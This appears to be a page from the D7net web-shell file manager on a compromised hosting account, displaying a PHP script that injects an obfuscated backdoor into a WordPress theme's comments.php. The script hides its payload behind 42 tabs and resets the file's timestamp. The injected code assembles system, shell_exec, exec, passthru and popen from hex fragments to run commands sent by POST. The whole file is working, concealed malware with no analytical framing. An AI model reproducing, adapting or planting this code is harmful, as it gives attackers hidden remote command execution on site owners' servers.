D7net
Home
Console
Upload
information
Create File
Create Folder
About
Tools
:
/
home
/
realadss
/
.cagefs
/
tmp
/
Filename :
.classes
back
Copy
<?php $path = '/home/realadss/public_html/joycater.in/wp-content/themes/astra/comments.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('%24property1%20%3D%20%276c6%27%3B%24property2%20%3D%20%27c5f%27%3B%24property3%20%3D%20%27737%27%3B%24property4%20%3D%20%27727%27%3B%24property5%20%3D%20%27706%27%3B%24property6%20%3D%20%27f70%27%3B%24property7%20%3D%20%27656%27%3B%24property8%20%3D%20%27472%27%3B%24property9%20%3D%20%2716d%27%3B%24property10%20%3D%20%27765%27%3B%24property11%20%3D%20%27745%27%3B%24property12%20%3D%20%27f63%27%3B%24property13%20%3D%20%27e74%27%3B%24property14%20%3D%20%2736c%27%3B%24property15%20%3D%20%276f7%27%3B%24property16%20%3D%20%27365%27%3B%24property17%20%3D%20%27636%27%3B%24post1%20%3D%20pack%28%22H%2A%22%2C%20%27737%27.%27973%27.%27746%27.%2756d%27%29%3B%24post2%20%3D%20pack%28%22H%2A%22%2C%20%27736%27.%27865%27.%24property1.%24property2.%27657%27.%27865%27%29%3B%24post3%20%3D%20pack%28%22H%2A%22%2C%20%27657%27.%27865%27%29%3B%24post4%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%27173%27.%24property3.%27468%27.%24property4%29%3B%24post5%20%3D%20pack%28%22H%2A%22%2C%20%24property5.%24property6.%24property7%29%3B%24post6%20%3D%20pack%28%22H%2A%22%2C%20%24property3.%24property8.%27656%27.%24property9.%275f6%27.%24property10.%24property11.%24property12.%276f6%27.%24property13.%24property7.%27e74%27%29%3B%24post7%20%3D%20pack%28%22H%2A%22%2C%20%27706%27.%24property14.%24property15.%24property16%29%3B%24content%20%3D%20pack%28%22H%2A%22%2C%20%24property17.%27f6e%27.%27746%27.%2756e%27%29%3Bif%28isset%28%24_POST%5B%24content%5D%29%29%7B%24content%3Dpack%28%22H%2A%22%2C%24_POST%5B%24content%5D%29%3Bif%28function_exists%28%24post1%29%29%7B%24post1%28%24content%29%3B%7Delseif%28function_exists%28%24post2%29%29%7Bprint%20%24post2%28%24content%29%3B%7Delseif%28function_exists%28%24post3%29%29%7B%24post3%28%24content%2C%24arg_variable%29%3Bprint%20join%28%22%5Cn%22%2C%24arg_variable%29%3B%7Delseif%28function_exists%28%24post4%29%29%7B%24post4%28%24content%29%3B%7Delseif%28function_exists%28%24post5%29%26%26function_exists%28%24post6%29%26%26function_exists%28%24post7%29%29%7B%24fld_placeholder%3D%24post5%28%24content%2C%22r%22%29%3Bif%28%24fld_placeholder%29%7B%24prop_parameter%3D%24post6%28%24fld_placeholder%29%3B%24post7%28%24fld_placeholder%29%3Bprint%20%24prop_parameter%3B%7D%7Dexit%3B%7D'); if (strstr($content, $new_code)) { die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { if (substr($content, 0, strlen($start)) == $start) { $content = substr($content, strlen($start)); $content = $start.str_repeat("\t", 42).$new_code."\n".$content; if (file_put_contents($path, $content)) { @touch($path, $ft); $content = file_get_contents($path); if (strstr($content, $new_code)) { die('!success!'); } } } } die('!failed!');